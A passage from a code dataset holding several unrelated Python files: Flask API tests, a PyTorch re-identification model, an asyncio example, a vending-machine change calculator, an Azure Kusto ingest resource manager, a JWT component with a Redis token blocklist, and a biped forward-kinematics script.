client.post('/login/iws', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n def test_return_service_grade_list(self):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = client.get('/services/service_grades', content_type='application/json')\n print(response.data)\n self.assertEqual(response.status_code, 200)\n\n response = client.post('/services/service_grades', content_type='application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_add_new_service_grade(self):\n data = {\n \"name\": \"+\"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(400, response.status_code)\n\n data = {\n \"service_grade_name\": \"+\"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(200, response.status_code)\n\n data = {\n \"service_grade_name\": \" \"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(400, response.status_code)\n print(response.data)\n # grade = ServiceGrade(name=\"common\")\n # type_ = ServiceType(name=\"nothing\")\n # grade.service_types.append(type_)\n # db.session.add(grade)\n # db.session.commit()\n # grades_list = ServiceGrade.list_service_grades()\n\n def _post_request(self, url, data):\n json_obj = json.dumps(data)\n response = self.app.post(url, data=json_obj, content_type='application/json')\n print(response.data)\n return response\n\n def _test_add_new_service_type(self, data, expected_response):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = self._post_request('/services/service_types', data)\n print(response)\n self.assertEqual(expected_response, response.status_code)\n\n def test_add_new_service_type_(self):\n data = {\n \"service_type\": {\n \"name\": \"change oidfgfgfl\",\n \"price\": 10\n },\n \"service_grades\": [1, 2]\n }\n self._test_add_new_service_type(data, 404)\n\n def test_add_new_service_type_bad_request(self):\n data = {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": \"10\"\n },\n \"service_grades\": [1, 2]\n }\n self._test_add_new_service_type(data, 400)\n\n def test_add_new_service_type(self):\n test_data = [\n {\n 'data': {\n \"service_type\": {\n \"name\": \"change oidfgfgfl\",\n \"price\": 10\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": \"10\"\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 400\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"dfdfdfdf\",\n \"price\": 1000\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"\",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 400\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \" \",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 400\n }\n ]\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"afsaneh92/dr_autol","sub_path":"test_cases/amish/register_users.py","file_name":"register_users.py","file_ext":"py","file_size_in_byte":11078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36336064696","text":"import torch\n\nfrom torch import nn\nfrom .component import Encoder, MappingNetwork, MemoryBank\n\n\n\nclass DIMNModel(nn.Module):\n \"\"\"\n This is Domain-Invariant-Mapping-Network model.\n \"\"\"\n def __init__(self, cls_size, params):\n super().__init__()\n\n feature_dim = params[\"feature_dim\"]\n self.encoder = Encoder(params=params[\"encoder\"])\n self.mapping_network = MappingNetwork(in_dim=feature_dim)\n self.memory_bank = MemoryBank(cls_size=cls_size, feature_dim=feature_dim, params=params[\"memory_bank\"])\n self.classifier = nn.Linear(feature_dim, cls_size, bias=False)\n\n\n def forward(self, x_probe, x_gallery, cls_):\n \"\"\"\n Args:\n \n Return:\n \n \"\"\"\n x = torch.cat((x_probe, x_gallery), dim=0)\n features = self.encoder(x)\n features_probe, features_gallery = features[:x_probe.size(0)], features[x_probe.size(0):]\n pred_cls_weights = self.mapping_network(features_gallery)\n selected_cls_weights, tmp_memory = self.memory_bank(pred_cls_weights, cls_)\n logits_classifier = self.classifier(features_probe)\n logits_mapping_network = torch.bmm(tmp_memory, features_probe.unsqueeze(2)).squeeze(2) # (B, C, 1)\n\n return features_probe, logits_classifier, logits_mapping_network, pred_cls_weights, selected_cls_weights, tmp_memory\n\n\n def inference_gallery(self, x, cls_):\n \"\"\"\n Args:\n\n Return:\n\n \"\"\"\n features = self.encoder.inference(x)\n pred_cls_weights = self.mapping_network.inference(features)\n self.memory_bank.inference(pred_cls_weights, cls_)\n\n\n def inference_probe(self, x):\n \"\"\"\n Args:\n\n Return:\n\n \"\"\"\n features = self.encoder.inference(x)\n pred_logits = torch.bmm(self.memory_bank.memory.repeat(x.size(0), 1, 1), features.unsqueeze(2)).squeeze(2) # (B, C, 1)\n\n return pred_logits \n","repo_name":"JackInTaiwan/ReID-DIMN","sub_path":"model/DIMNModel.py","file_name":"DIMNModel.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38452804177","text":"# coding=utf-8\nimport asyncio\nimport time\n\n\nasync def main():\n print(f'{time.ctime()} Hello!')\n await asyncio.sleep(1.0)\n print(f'{time.ctime()} Goodbye!')\n\n\ndef blocking():\n # 此调用是会 block 主线程,阻止 loop 继续运行下去,因此不能让此函数作为 coroutine。\n # 解决方法是让它执行于一个 executor.\n time.sleep(0.5)\n print(f'{time.ctime()} Hello from a thread!')\n\n\nloop = asyncio.get_event_loop()\ntask = loop.create_task(main())\n\n# 此函数仅仅发起一个 schedule,并不真正执行,直到 run_until_complete;返回类型为 Future\nloop.run_in_executor(None, blocking)\nloop.run_until_complete(task)\n\n# pending 不包含 blocking future,只关心 task。\npending = asyncio.all_tasks(loop=loop)\nfor task in pending:\n task.cancel()\ngroup = asyncio.gather(*pending, return_exceptions=True)\nloop.run_until_complete(group)\nloop.close()\n","repo_name":"anderscui/Programming","sub_path":"py3/concurrency/asyncio_book/ex3_3.py","file_name":"ex3_3.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6142466266","text":"\"\"\"\n# 自動販売機のおつり計算プログラム\n\n[条件]\n* cencelと入力されたとき、おつりを計算して処理を終了する\n* 10,000円を超える金額が入力されたとき、再度投入金額を問う\n* 投入金額では何も買えないとき、再度投入金額を問う\n* 1の位が0以外の場合には再度投入金額を問う\n* 残金がちょうど0の場合にはメッセージを出力することなく終了する\n* 残金がある場合Y/Nの入力に対応した処理を返す\n* おつりは5000円・2000円・1000円・500円・100円・50円・10円の大きい順に割り当てて返却する\n\n\n\"\"\"\n\ndef calc_vend_change(item_price):\n '''\n \n * 機能 : 自販機のおつりを計算する\n * 入力 : 商品とその値段(dict)\n * 出力 : None\n * 内部関数 : \n 1. _validate_input() : バリデーション\n 2. _purchase() : 商品の購入処理\n 3. _calc_change : おつりの計算\n \n ''' \n min_val = min(list(item_price.values()))\n def _validate_input(money,min_price=min_val):\n '''\n * 機能 : 投入金額のバリデーションを行う。\n * 入力 : \n 1. money : 投入金額 (int)\n 2. min_price : 商品の最安値 (int)\n * 出力 : 投入金額 (int)\n * 補足 : 再起呼び出し\n \n '''\n # 条件1 : 投入金額が10000円以下\n if money > 10000:\n OVER_MONEY_TEXT = \"10,000円を超える金額は投入できません。再度投入金額を入力してください\"\n new_money = int(input(OVER_MONEY_TEXT))\n _validate_input(new_money)\n \n # 条件2 : 投入金額が商品の最低金額以上\n if money < min_price:\n not_enough_text = f\"{money}円では購入できる商品がありません。再度投入金額を入力してください\"\n new_money = int(input(not_enough_text))\n _validate_input(new_money)\n \n # 条件3 : 投入金額の1の位が0以外\n if str(money)[-1] != \"0\":\n INVALID_TEXT = \"1円玉、5円玉は使用できません。再度投入金額を入力してください\"\n new_money = int(input(INVALID_TEXT))\n _validate_input(new_money)\n\n return money\n \n def _purchase(change, item_price=item_price, min_price=min_val):\n '''\n * 機能 : 商品購入部分の処理\n * 入力 : \n 1. change : 残金 (int)\n 2. item_price : 商品とその値段 (dict) \n 3. min_price : 商品の最安値 (int)\n * 出力 : None or 残金(int)\n * 補足 : 再帰呼び出し\n \n '''\n ASK_PURCHASE_TEXT = \"何を購入しますか(商品名/cancel)\"\n item_name = input(ASK_PURCHASE_TEXT) \n \n # cancelが入力されたとき、残金を返す\n if item_name == \"cancel\" or item_name == \"c\":\n return change\n \n # 残金の計算\n new_change = change - item_price[item_name]\n \n # 残金がちょうど0円のとき\n if new_change == 0:\n return None\n \n # 残金が最安値より小さいとき\n if new_change < min_price:\n return new_change\n \n # 残金の表示\n change_text = f\"残金:{new_change}円\"\n print(change_text)\n \n # 購入を継続するか。\n # Yなら再帰呼び出し。Nなら残金を返す。 それ以外なら再度質問をする。\n flag = True\n while flag:\n \n IS_CONTINUE_TEXT = \"続けて購入しますか(Y/N)\"\n is_continue = input(IS_CONTINUE_TEXT)\n \n # 購入を継続するとき、再帰呼び出し\n if is_continue == 'Y' or is_continue == \"y\":\n flag = False\n _purchase(new_change)\n # 継続しないとき、残金を返す\n elif is_continue == 'N' or is_continue == \"n\":\n flag = False\n return new_change\n else:\n pass \n\n def _calc_change(change):\n '''\n * 機能 : 残金からおつりを計算する\n * 入力 : \n 1. change : 残金 (int)\n * 出力 : None \n \n ''' \n print(\"おつり\")\n \n # おつりの構成要素\n jpy = (5000, 2000, 1000, 500, 100, 50, 10)\n \n # 残金からおつりを計算してchange_listに格納\n change_list = []\n for i in jpy:\n if change >= i :\n num = change // i\n change_list.append((i, num))\n change -= i * num\n \n \n # おつりの出力\n for pay in change_list:\n if len(str(pay[0])) >= 4:\n print(f\"{pay[0]}円札:{pay[1]}枚\")\n else:\n print(f\"{pay[0]}円玉:{pay[1]}枚\")\n \n \n # 商品とその値段を出力\n for k, v in item_price.items():\n print(f\"{k} : {v}円\")\n \n # 初回の金額の受け取り\n INPUT_TEXT = \"投入金額を入力してください\"\n money = int(input(INPUT_TEXT))\n # 投入金額のバリデーション\n is_valid_money = _validate_input(money, min_val)\n # 金額に応じた購入処理\n change = _purchase(is_valid_money)\n \n # おつりがない場合は何も表示せず終了\n if change is None:\n return \n else:\n # おつりの計算\n _calc_change(change) \n \nif __name__ == \"__main__\":\n item_price_dict = {\n \"お茶\" : 110,\n \"コーヒー\" : 100,\n \"ソーダ\" : 160,\n \"コーンポタージュ\" : 130,\n }\n calc_vend_change(item_price_dict)","repo_name":"makinokoudai/python_teamB_2023518","sub_path":"uehata/vendcalc.py","file_name":"vendcalc.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"449339600","text":"from datetime import datetime, timedelta\nfrom typing import List, Dict\nfrom urllib.parse import urlparse\n\nfrom tenacity import retry_if_exception_type, stop_after_attempt, Retrying, wait_random_exponential\n\nfrom azure.kusto.data import KustoClient\nfrom azure.kusto.data._models import KustoResultTable\nfrom azure.kusto.data._telemetry import MonitoredActivity, Span\nfrom azure.kusto.data.exceptions import KustoThrottlingError\nfrom azure.kusto.ingest._storage_account_set import _RankedStorageAccountSet\n\n_SHOW_VERSION = \".show version\"\n_SERVICE_TYPE_COLUMN_NAME = \"ServiceType\"\n\n\nclass _ResourceUri:\n def __init__(self, url: str):\n self.url = url\n self.parsed = urlparse(url)\n self.storage_account_name = self.parsed.netloc.split(\".\", 1)[0]\n self.object_name = self.parsed.path.lstrip(\"/\")\n\n @property\n def account_uri(self) -> str:\n return f\"{self.parsed.scheme}://{self.parsed.netloc}/?{self.parsed.query}\"\n\n def __str__(self):\n return self.url\n\n\nclass _IngestClientResources:\n def __init__(\n self,\n secured_ready_for_aggregation_queues: List[_ResourceUri] = None,\n failed_ingestions_queues: List[_ResourceUri] = None,\n successful_ingestions_queues: List[_ResourceUri] = None,\n containers: List[_ResourceUri] = None,\n status_tables: List[_ResourceUri] = None,\n ):\n self.secured_ready_for_aggregation_queues = secured_ready_for_aggregation_queues\n self.failed_ingestions_queues = failed_ingestions_queues\n self.successful_ingestions_queues = successful_ingestions_queues\n self.containers = containers\n self.status_tables = status_tables\n\n def is_applicable(self):\n resources = [\n self.secured_ready_for_aggregation_queues,\n self.failed_ingestions_queues,\n self.failed_ingestions_queues,\n self.containers,\n self.status_tables,\n ]\n return all(resources)\n\n\nclass _ResourceManager:\n def __init__(self, kusto_client: KustoClient):\n self._kusto_client = kusto_client\n self._refresh_period = timedelta(hours=1)\n\n self._ingest_client_resources = None\n self._ingest_client_resources_last_update = None\n self._ranked_storage_account_set = _RankedStorageAccountSet()\n\n self._authorization_context = None\n self._authorization_context_last_update = None\n\n self.__set_throttling_settings()\n\n def close(self):\n self._kusto_client.close()\n\n def __set_throttling_settings(self, num_of_attempts: int = 4, max_seconds_per_retry: float = 30):\n self._retryer = Retrying(\n wait=wait_random_exponential(max=max_seconds_per_retry),\n retry=retry_if_exception_type(KustoThrottlingError),\n stop=stop_after_attempt(num_of_attempts),\n reraise=True,\n )\n\n def _refresh_ingest_client_resources(self):\n if (\n not self._ingest_client_resources\n or (self._ingest_client_resources_last_update + self._refresh_period) <= datetime.utcnow()\n or not self._ingest_client_resources.is_applicable()\n ):\n self._ingest_client_resources = self._get_ingest_client_resources_from_service()\n self._ingest_client_resources_last_update = datetime.utcnow()\n self._populate_ranked_storage_account_set()\n\n def _get_resource_by_name(self, table: KustoResultTable, resource_name: str):\n return [_ResourceUri(row[\"StorageRoot\"]) for row in table if row[\"ResourceTypeName\"] == resource_name]\n\n def _get_ingest_client_resources_from_service(self):\n # trace all calls to get ingestion resources\n def invoker():\n return MonitoredActivity.invoke(\n lambda: self._kusto_client.execute(\"NetDefaultDB\", \".get ingestion resources\"),\n name_of_span=\"_ResourceManager.get_ingestion_resources\",\n tracing_attributes=Span.create_cluster_attributes(self._kusto_client._kusto_cluster),\n )\n\n result = self._retryer(invoker)\n table = result.primary_results[0]\n\n secured_ready_for_aggregation_queues = self._get_resource_by_name(table, \"SecuredReadyForAggregationQueue\")\n failed_ingestions_queues = self._get_resource_by_name(table, \"FailedIngestionsQueue\")\n successful_ingestions_queues = self._get_resource_by_name(table, \"SuccessfulIngestionsQueue\")\n containers = self._get_resource_by_name(table, \"TempStorage\")\n status_tables = self._get_resource_by_name(table, \"IngestionsStatusTable\")\n\n return _IngestClientResources(secured_ready_for_aggregation_queues, failed_ingestions_queues, successful_ingestions_queues, containers, status_tables)\n\n def _refresh_authorization_context(self):\n if (\n not self._authorization_context\n or self._authorization_context.isspace()\n or (self._authorization_context_last_update + self._refresh_period) <= datetime.utcnow()\n ):\n self._authorization_context = self._get_authorization_context_from_service()\n self._authorization_context_last_update = datetime.utcnow()\n\n def _get_authorization_context_from_service(self):\n # trace all calls to get identity token\n def invoker():\n return MonitoredActivity.invoke(\n lambda: self._kusto_client.execute(\"NetDefaultDB\", \".get kusto identity token\"),\n name_of_span=\"_ResourceManager.get_identity_token\",\n tracing_attributes=Span.create_cluster_attributes(self._kusto_client._kusto_cluster),\n )\n\n result = self._retryer(invoker)\n return result.primary_results[0][0][\"AuthorizationContext\"]\n\n def _populate_ranked_storage_account_set(self):\n for resource in self._ingest_client_resources.containers:\n self._ranked_storage_account_set.add_storage_account(resource.storage_account_name)\n for resource in self._ingest_client_resources.secured_ready_for_aggregation_queues:\n self._ranked_storage_account_set.add_storage_account(resource.storage_account_name)\n\n def _group_resources_by_storage_account(self, resources: List[_ResourceUri]) -> Dict[str, List[_ResourceUri]]:\n resources_by_storage_account = {}\n for resource in resources:\n if resource.storage_account_name not in resources_by_storage_account:\n resources_by_storage_account[resource.storage_account_name] = list()\n resources_by_storage_account[resource.storage_account_name].append(resource)\n\n return resources_by_storage_account\n\n def _get_shuffled_and_ranked_resources(self, resources: List[_ResourceUri]) -> List[List[_ResourceUri]]:\n resources_by_storage_account = self._group_resources_by_storage_account(resources)\n ranked_storage_accounts = self._ranked_storage_account_set.get_ranked_shuffled_accounts()\n\n # sort resources by storage account rank\n ranked_resources = list()\n for storage_account in ranked_storage_accounts:\n if storage_account.account_name in resources_by_storage_account.keys():\n ranked_resources.append(resources_by_storage_account[storage_account.account_name])\n\n return ranked_resources\n\n def _shuffle_and_select_with_round_robin(self, resources: List[_ResourceUri]) -> List[_ResourceUri]:\n # get list of resources sorted by storage account rank\n rank_shuffled_resources_list = self._get_shuffled_and_ranked_resources(resources)\n\n # select resources with non-repeating round robin and flatten the list\n result = []\n while True:\n if all(not lst for lst in rank_shuffled_resources_list):\n break\n\n for lst in rank_shuffled_resources_list:\n if lst:\n result.append(lst.pop(0))\n\n return result\n\n def get_ingestion_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._shuffle_and_select_with_round_robin(self._ingest_client_resources.secured_ready_for_aggregation_queues)\n\n def get_failed_ingestions_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.failed_ingestions_queues\n\n def get_successful_ingestions_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.successful_ingestions_queues\n\n def get_containers(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._shuffle_and_select_with_round_robin(self._ingest_client_resources.containers)\n\n def get_ingestions_status_tables(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.status_tables\n\n def get_authorization_context(self):\n self._refresh_authorization_context()\n return self._authorization_context\n\n def retrieve_service_type(self):\n try:\n command_result = self._kusto_client.execute(\"NetDefaultDB\", _SHOW_VERSION)\n return command_result.primary_results[0][0][_SERVICE_TYPE_COLUMN_NAME]\n except (TypeError, KeyError):\n return \"\"\n\n def set_proxy(self, proxy_url: str):\n self._kusto_client.set_proxy(proxy_url)\n\n def report_resource_usage_result(self, storage_account_name: str, success_status: bool):\n self._ranked_storage_account_set.add_account_result(storage_account_name, success_status)\n","repo_name":"Azure/azure-kusto-python","sub_path":"azure-kusto-ingest/azure/kusto/ingest/_resource_manager.py","file_name":"_resource_manager.py","file_ext":"py","file_size_in_byte":9588,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"31597169528","text":"import typing as t\n\nimport redis\nfrom flask import Flask, session\nfrom flask_babel import lazy_gettext as _\nfrom flask_jwt_extended import JWTManager as _JWTManager\n\nfrom bwm.component.base import Component\nfrom bwm.type import Data\n\n\nclass JWTComponent(Component):\n def register(self):\n from bwm.model import account\n\n jwt.init_app(self._app)\n\n @jwt.user_identity_loader\n def user_identity_lookup(user: account.User):\n return str(user.union_id)\n\n @jwt.user_lookup_loader\n def user_lookup_callback(\n jwt_header: dict, jwt_data: dict\n ) -> t.Optional[account.User]:\n return _get_login_user(jwt_data)\n\n @jwt.token_in_blocklist_loader\n def check_if_token_is_revoked(jwt_header: dict, jwt_data: dict):\n jti = jwt_data[\"jti\"]\n revoked_key = self._app.config[\"JWT_REVOKED_KEY\"].format(jti)\n token_in_redis = jwt.redis_blocklist.get(revoked_key)\n return token_in_redis is not None\n\n @jwt.token_verification_loader\n def token_verification(jwt_header: dict, jwt_data: dict):\n return _get_login_user(jwt_data) is not None\n\n def _get_login_user(jwt_data: dict):\n union_id = jwt_data[\"sub\"]\n user_data: Data = session.get(union_id)\n if user_data is None:\n user: t.Optional[account.User] = account.User.query.filter_by(\n union_id=union_id, is_delete=False\n ).first()\n if user:\n session[union_id] = user.to_dict()\n else:\n user = account.User(**user_data)\n return user\n\n\nclass JWTManager(_JWTManager):\n def __init__(self, app: Flask = None) -> None:\n super().__init__(app)\n self._redis_blocklist: t.Optional[redis.StrictRedis] = None\n\n def init_app(self, app: Flask) -> None:\n super().init_app(app)\n\n redis_host = app.config[\"JWT_BLACKLIST_REDIS_HOST\"]\n redis_port = app.config[\"JWT_BLACKLIST_REDIS_PORT\"]\n redis_db = app.config[\"JWT_BLACKLIST_REDIS_DB\"]\n self._redis_blocklist = redis.StrictRedis(\n host=redis_host, port=redis_port, db=redis_db, decode_responses=True\n )\n\n @property\n def redis_blocklist(self):\n if not self._redis_blocklist:\n raise RuntimeError(_(\"redis_blocklist 未初始化\"))\n return self._redis_blocklist\n\n\njwt = JWTManager()\n","repo_name":"terrluo/bwm","sub_path":"bwm/component/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9626599909","text":"import numpy as np\n\ndef parse_data(filename):\n xs = []\n ys = []\n with open(filename) as f:\n for line in f.readlines():\n line = line[:-1].replace(',', '')\n line = [int(x) for x in line.replace('-', '')]\n x = line[::2]\n y = line[1::2]\n xs.append(x)\n ys.append(y)\n return xs, ys\n\ndef parse_and_preprocess_data(filename):\n \"\"\"\n Parse data and map each point form the lattice to [0..99]\n using fixed permutation\n \"\"\"\n np.random.seed(1337)\n permutation = np.random.permutation(100)\n data = []\n with open(filename) as f:\n for line in f.readlines():\n line = line[:-1].replace(',', '')\n line = [int(x) for x in line.replace('-', '')]\n xs = line[::2]\n ys = line[1::2]\n indices = [x + y * 10 for x, y in zip(xs,ys)]\n data.append([permutation[index] for index in indices])\n return data\n\ndef parse_labels(filename):\n labels = []\n with open(filename) as f:\n for line in f.readlines():\n labels.append(int(line[:-1]))\n\n return labels","repo_name":"probably-nothing1/SequenceClassification","sub_path":"src/dataset/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21912050490","text":"#forward kinematics functions\n\nfrom vpython import *\nimport numpy as np\n# Uses Kajita matlab script as basis\n#SetupBiped sets parameters of each joint. Child and sister empty as sister only relevant for top hip joint, and child not relevant for foot.\n# Number is joint number, a is joint axis, q is joint velocity\nclass SetupBiped:\n def __init__(self, number, a, q, pos, rm, b = None, parent = None):\n self.number = number\n self.child = []\n self.sister = None\n self.a = a\n self.q = q\n self.pos=pos\n self.parent = parent\n self.b = b\n self.rm = rm #np.array([[1, 0, 0],[0,1,0],[0,0,1]])\n \n if self.parent is not None:\n self.parent.child.append(self)\n #self.tm_0_i = np.array([[1,0,0,self.pos.x-self.parent.pos.x],[0,1,0,self.pos.y-self.parent.pos.y],[0, 0, 1, self.pos.z-self.parent.pos.z],[0,0,0,1]])\n #if self.parent is None:\n #condition here\n\n \n def ForwardKinematics(self, joint_angle):\n # cant do dot product on 3x3 vector, so seperate operations, make into vector parent_RM_mult_b that is 1x3\n # equivalent to rm * b\n parent_rm_mul_b= vector(dot(self.parent.rm[0], self.b), dot(self.parent.rm[1], self.b), dot(self.parent.rm[2], self.b))\n self.pos = parent_rm_mul_b + self.parent.pos\n\n #Rodrigues formula\n eye = [[1,0,0],[0,1,0],[0,0,1]] #for rodrigues\n wedge = np.array([[0, -self.a.z, self.a.y], [self.a.z, 0, -self.a.x], [-self.a.y, self.a.x, 0]])#3x3\n squared = wedge.dot(wedge)\n e = np.array(eye + wedge*sin(joint_angle) + squared*(1-cos(joint_angle))) #R = eye(3) + w_wedge * sin(th) + w_wedge^2 * (1-cos(th));\n \n \n #convert parent's rotation matrix (vector) to array so that dot product works\n rm_to_array = np.array([[self.parent.rm[0].x, self.parent.rm[0].y, self.parent.rm[0].z],[self.parent.rm[1].x, self.parent.rm[1].y,self.parent.rm[1].z],[ self.parent.rm[2].x, self.parent.rm[2].y, self.parent.rm[2].z]])\n self.rm =np.dot(rm_to_array, e)\n\n #convert back to make into array of vectors as used to update position, a vector\n row_1 = vector(self.rm[0,0], self.rm[0,1], self.rm[0,2])\n row_2 = vector(self.rm[1,0], self.rm[1,1], self.rm[1,2])\n row_3 = vector(self.rm[2,0], self.rm[2,1], self.rm[2,2])\n self.rm = [row_1,row_2,row_3]\n \n self.draw()\n\n def draw(self):\n joint_rad = 4\n #toggle visibility??\n joint_drawing = sphere(pos=self.pos, radius=joint_rad)\n if self.parent is not None:\n leg_drawing = curve([self.pos, self.parent.pos], radius = 1.5)\n\n \"\"\"\n def CalcVWerr(self, target):\n #calculate error in position\n perr = target.pos - self.pos\n #convert to matrices\n self_rm_array = np.array([[self.rm[0].x, self.rm[0].y, self.rm[0].z],[self.rm[1].x, self.rm[1].y,self.rm[1].z],[self.rm[2].x, self.rm[2].y, self.rm[2].z]])\n target_rm_array = np.array([[target.rm[0].x, target.rm[0].y, target.rm[0].z],[target.rm[1].x, target.rm[1].y,target.rm[1].z],[target.rm[2].x, target.rm[2].y, target.rm[2].z]])\n Rerr = self_rm_array.transpose * target_rm_array\n\n #rot2omega -Transform rotation matrix into the corresponding angular velocity vector T.Sugihara, Humanoids 2009\n el = np.array([[Rerr[2,1]-Rerr[1,2]], [Rerr[0,2] - Rerr[2,0]], [Rerr[1,0] - Rerr[0,1]]])\n norm_el = norm(el)\n if norm_el > 2^(-52):\n w = atan2(norm_el, (np.trace(Rerr)-1)/norm_el * el)\n elif Rerr[0,0]> 0 and Rerr[1,1] >0 and Rerr[2,2] > 0:\n w = np.array[0,0,0]\n else:\n w = pi/2 * np.array([[Rerr[0,0] +1], [Rerr[1,1] +1], [Rerr[2,2]+1]])\n\n #use angular velcoity vector to calculate error in ?angle\n werr = self_rm_array * w\n err = np.array([[perr],[werr]])\n #return both errors\n return err\n\n def CalcJacobian(self):\n J = np.zeros(6,6)\n joint_array = [j1, j2, j3, j4, j5, j6, j7]\n \n for n in range(2,7):\n joint = joint_array(n)\n #a =joint.rm * joint.a\n a = vector(dot(joint.rm[0], joint.a), dot(joint.rm[1], joint.a), dot(joint.rm[2], joint.a))\n #need array to append into Jacobian\n a_to_array = np.array([a.x, a.y, a.z])\n cross_product = cross(a, j7.pos - joint.pos)\n cross_product_array = np.array([cross_product.x, cross_product.y, cross_product.z])\n J[:,n-1] = [cross_product_array, a_to_array]\n\n\n def InverseKinematics(self, target):\n #finds links from self through to foot\n #while self.number > route.len():\n # route.append(route.len() + 1)\n\n #update all joints \n #what to do with joint 1\n joint_array = [j2, j3, j4, j5, j6, j7]\n for joint in joint_array:\n joint.ForwardKinematics(0)\n \n #calculate errors\n err = self.CalcVWerr(target)\n\n #for loop to break at error\n for n in range(1,10): #10 iterations\n if norm(err) < 10^(-6):\n break\n\n #calculate Jacobian\n self.CalcJacobian()\n\n #calc adjustments\n\n #addition of q + dq\n\n #update ForwardKinematics again for all joints\n\n #calc error again until satisfies \n \n\n \"\"\"\n# setting a, joint axis vector (roll, pitch, yaw)\nUX = vector(1,0,0)\nUY = vector(0,1,0)\nUZ = vector(0,0,1)\n\n\"\"\"\"\nj1.pos = vector(67, 86, 0)\nj2.pos = vector(50, 86, 0)\nj3.pos = vector(50, 78, 0)\nj4.pos = vector(50, 78, 0)\nj5.pos = vector(50, 44, 0)\nj6.pos = vector(50, 19, 0)\nj7.pos = vector(50, 0, 0)\n\nj8.pos = vector(76, 86, 0)\nj9.pos = vector(76, 78, 0)\nj10.pos = vector(84, 78, 0)\nj11.pos = vector(84, 44, 0)\nj12.pos = vector(84, 19, 0)\nj13.pos = vector(84, 0, 0)\n\"\"\"\nex = vector(1,0,0) #vector(1,0,0)\ney = vector(0,1,0) #vector(0,0,1)\nez = vector(0,0,1) #vector(0,-1,0)\neye_rm = [ex, ey, ez] #x, y, z\n\n#joint 1 is body, increasing joint no = down right leg, j7 is foot\n#Axis as defined in VPython setup\n# number, a, q, pos, rm, b = None, parent = None):\nj1 = SetupBiped(1, UY, 0, vector(67, 86, 0), eye_rm )\nj2 = SetupBiped(2, UY, 0, vector(58, 86, 0), eye_rm, vector(-9,0,0), j1)\nj3 = SetupBiped(3, UZ, 0, vector(58, 78, 0), eye_rm, vector(0, 78-86,0), j2)\nj4 = SetupBiped(4, UX, 0, vector(50, 78, 0), eye_rm, vector(50-58,0,0), j3)\nj5 = SetupBiped(5, UX, 0, vector(50, 44, 0), eye_rm, vector(0,44-78,0), j4)\nj6 = SetupBiped(6, UX, 0, vector(50, 19, 0), eye_rm, vector(0, 19-44,0), j5)\nj7 = SetupBiped(7, UZ, 0, vector(50, 0, 0), eye_rm, vector(0, -19,0), j6)\n\n#Left leg going down, j13 is foot\nj8 = SetupBiped(8, UY, 0, vector(76, 86, 0), eye_rm, vector(76-67,0,0),j1)\nj9 = SetupBiped(9, UZ, 0, vector(76, 78, 0), eye_rm, vector(0,78-86,0),j8)\nj10 = SetupBiped(10, UX, 0, vector(84, 78, 0), eye_rm, vector(84-76,0,0), j9)\nj11 = SetupBiped(11, UX, 0, vector(84, 44, 0), eye_rm, vector(0,44-78,0), j10)\nj12 = SetupBiped(12, UX, 0, vector(84, 19, 0), eye_rm, vector(0,19-44,0),j11)\nj13 = SetupBiped(13, UZ, 0, vector(84, 0, 0), eye_rm, vector(0,-19,0), j12)\n\n#** two children of body: left hip, right hip. Instead of one child and one sister for joint 2**\nj1.child = [j2, j8] \n\n#j2.sister = j8\nj2.child = j3\n#right leg\nj3.child = j4\nj4.child = j5\nj5.child = j6\nj6.child = j7\n#left leg\nj8.child = j9\nj9.child = j10\nj10.child = j11\nj12.child = 